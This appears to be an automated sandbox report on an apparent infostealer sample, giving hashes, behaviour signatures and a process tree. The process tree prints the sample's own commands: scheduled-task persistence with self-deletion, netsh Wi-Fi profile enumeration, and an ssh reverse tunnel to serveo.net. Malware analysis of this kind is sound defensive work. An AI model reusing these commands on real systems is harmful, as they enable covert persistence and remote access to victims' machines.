Analysis
- max time kernel: 132s
- max time network: 125s
- platform: windows10-2004_x64
- resource: win10v2004-20240426-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 22-05-2024 02:30

Static task: static1

Behavioral task: behavioral1
  Sample: e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
  Resource: win7-20240508-en

Behavioral task: behavioral2
  Sample: e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
  Resource: win10v2004-20240426-en
General
- Target: e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
- Size: 120KB
- MD5: 479d30cd484920e686388641718edc53
- SHA1: c7040a1893168c204c759280d9671b0b58890c8c
- SHA256: e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601
- SHA512: e499941a4f0f0764ab7493f3f7aa588473409881aa4564a9939cfd60232bd1de672ecfc099d6712fa1eb4da272855f92c95fdf610f688c81894a6258cd3dd51d
- SSDEEP: 1536:2Wzd3+6aUp+3aTvjgFnbF/nt6z9b1Caom02vrDxcHtcV/erWEUzny94BgJad:z3av3aTvjv9b1Ch30rDxcHtcV/SquI
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely for geofencing.
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
- Executes dropped EXE (2 IoCs)
  Processes:
    pid | process
    5008 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
    2980 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials and other sensitive data.
- Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
    Key opened | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
    Key opened | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow | ioc
    31 | ip-api.com
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Delays execution with timeout.exe (1 IoC)
  Processes:
    pid | process
    2852 | timeout.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes:
    pid | process
    5008 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
    5008 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
    5008 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
    5008 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
    2980 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 1340 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
    Token: SeDebugPrivilege | 5008 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
    Token: SeDebugPrivilege | 2980 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes:
    pid | process
    5008 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
    2980 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
- Suspicious use of WriteProcessMemory (30 IoCs)
  Processes:
    description | pid | process | target process
    PID 1340 wrote to memory of 4364 | 1340 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe | cmd.exe
    PID 1340 wrote to memory of 4364 | 1340 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe | cmd.exe
    PID 4364 wrote to memory of 2120 | 4364 | cmd.exe | chcp.com
    PID 4364 wrote to memory of 2120 | 4364 | cmd.exe | chcp.com
    PID 4364 wrote to memory of 2852 | 4364 | cmd.exe | timeout.exe
    PID 4364 wrote to memory of 2852 | 4364 | cmd.exe | timeout.exe
    PID 4364 wrote to memory of 2184 | 4364 | cmd.exe | schtasks.exe
    PID 4364 wrote to memory of 2184 | 4364 | cmd.exe | schtasks.exe
    PID 4364 wrote to memory of 5008 | 4364 | cmd.exe | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
    PID 4364 wrote to memory of 5008 | 4364 | cmd.exe | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
    PID 5008 wrote to memory of 2280 | 5008 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe | cmd.exe
    PID 5008 wrote to memory of 2280 | 5008 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe | cmd.exe
    PID 2280 wrote to memory of 2316 | 2280 | cmd.exe | chcp.com
    PID 2280 wrote to memory of 2316 | 2280 | cmd.exe | chcp.com
    PID 2280 wrote to memory of 2028 | 2280 | cmd.exe | netsh.exe
    PID 2280 wrote to memory of 2028 | 2280 | cmd.exe | netsh.exe
    PID 2280 wrote to memory of 3664 | 2280 | cmd.exe | findstr.exe
    PID 2280 wrote to memory of 3664 | 2280 | cmd.exe | findstr.exe
    PID 5008 wrote to memory of 5116 | 5008 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe | cmd.exe
    PID 5008 wrote to memory of 5116 | 5008 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe | cmd.exe
    PID 5116 wrote to memory of 1428 | 5116 | cmd.exe | chcp.com
    PID 5116 wrote to memory of 1428 | 5116 | cmd.exe | chcp.com
    PID 5116 wrote to memory of 1308 | 5116 | cmd.exe | netsh.exe
    PID 5116 wrote to memory of 1308 | 5116 | cmd.exe | netsh.exe
    PID 5116 wrote to memory of 3956 | 5116 | cmd.exe | findstr.exe
    PID 5116 wrote to memory of 3956 | 5116 | cmd.exe | findstr.exe
    PID 5008 wrote to memory of 4616 | 5008 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe | ssh.exe
    PID 5008 wrote to memory of 4616 | 5008 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe | ssh.exe
    PID 2980 wrote to memory of 4152 | 2980 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe | ssh.exe
    PID 2980 wrote to memory of 4152 | 2980 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe | ssh.exe
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
- outlook_office_path (1 IoC)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
- outlook_win_path (1 IoC)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe"
  signatures: Checks computer location settings; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe" &&START "" "C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe"
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\chcp.com
      command line: chcp 65001
    - C:\Windows\system32\timeout.exe
      command line: timeout /t 3
      signatures: Delays execution with timeout.exe
    - C:\Windows\system32\schtasks.exe
      command line: schtasks /create /tn "e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe" /rl HIGHEST /f
      signatures: Creates scheduled task(s)
    - C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
      command line: "C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe"
      signatures: Executes dropped EXE; Accesses Microsoft Outlook profiles; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory; outlook_office_path; outlook_win_path
      - C:\Windows\SYSTEM32\cmd.exe
        command line: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\chcp.com
          command line: chcp 65001
        - C:\Windows\system32\netsh.exe
          command line: netsh wlan show profiles
        - C:\Windows\system32\findstr.exe
          command line: findstr /R /C:"[ ]:[ ]"
      - C:\Windows\SYSTEM32\cmd.exe
        command line: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\chcp.com
          command line: chcp 65001
        - C:\Windows\system32\netsh.exe
          command line: netsh wlan show networks mode=bssid
        - C:\Windows\system32\findstr.exe
          command line: findstr "SSID BSSID Signal"
      - C:\Windows\System32\OpenSSH\ssh.exe
        command line: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6240 serveo.net
- C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
  command line: C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
  signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\OpenSSH\ssh.exe
    command line: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6240 serveo.net
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe.log
  Filesize: 847B
  MD5: 3308a84a40841fab7dfec198b3c31af7
  SHA1: 4e7ab6336c0538be5dd7da529c0265b3b6523083
  SHA256: 169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
  SHA512: 97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198
- C:\Users\Admin\AppData\Local\RobloxSecurity\e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601.exe
  Filesize: 120KB
  MD5: 479d30cd484920e686388641718edc53
  SHA1: c7040a1893168c204c759280d9671b0b58890c8c
  SHA256: e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601
  SHA512: e499941a4f0f0764ab7493f3f7aa588473409881aa4564a9939cfd60232bd1de672ecfc099d6712fa1eb4da272855f92c95fdf610f688c81894a6258cd3dd51d
- C:\Users\Admin\AppData\Local\lbdd1brp2p\p.dat
  Filesize: 4B
  MD5: 405075699f065e43581f27d67bb68478
  SHA1: 1a20cf59f0584ada3deeff6c1c5b4c11c691aec0
  SHA256: 7666197a246dded3b8238775f3cedf8350a2858a8117e744a703987dd55aa497
  SHA512: c5eb5e284710fbc093bb55feae8a6623d0366db40a03cbd399d7173e06641dab84dad3cf5c0dc330b727498688093b9a7fc884f7afbe88c0627f963adc61deb1
- memory/1340-0-0x00007FFE5FD83000-0x00007FFE5FD85000-memory.dmp
  Filesize: 8KB
- memory/1340-1-0x0000024C732B0000-0x0000024C732D4000-memory.dmp
  Filesize: 144KB
- memory/1340-4-0x00007FFE5FD80000-0x00007FFE60841000-memory.dmp
  Filesize: 10.8MB
- memory/1340-6-0x00007FFE5FD80000-0x00007FFE60841000-memory.dmp
  Filesize: 10.8MB
- memory/5008-11-0x00007FFE5DDE3000-0x00007FFE5DDE5000-memory.dmp
  Filesize: 8KB
- memory/5008-16-0x00007FFE5DDE3000-0x00007FFE5DDE5000-memory.dmp
  Filesize: 8KB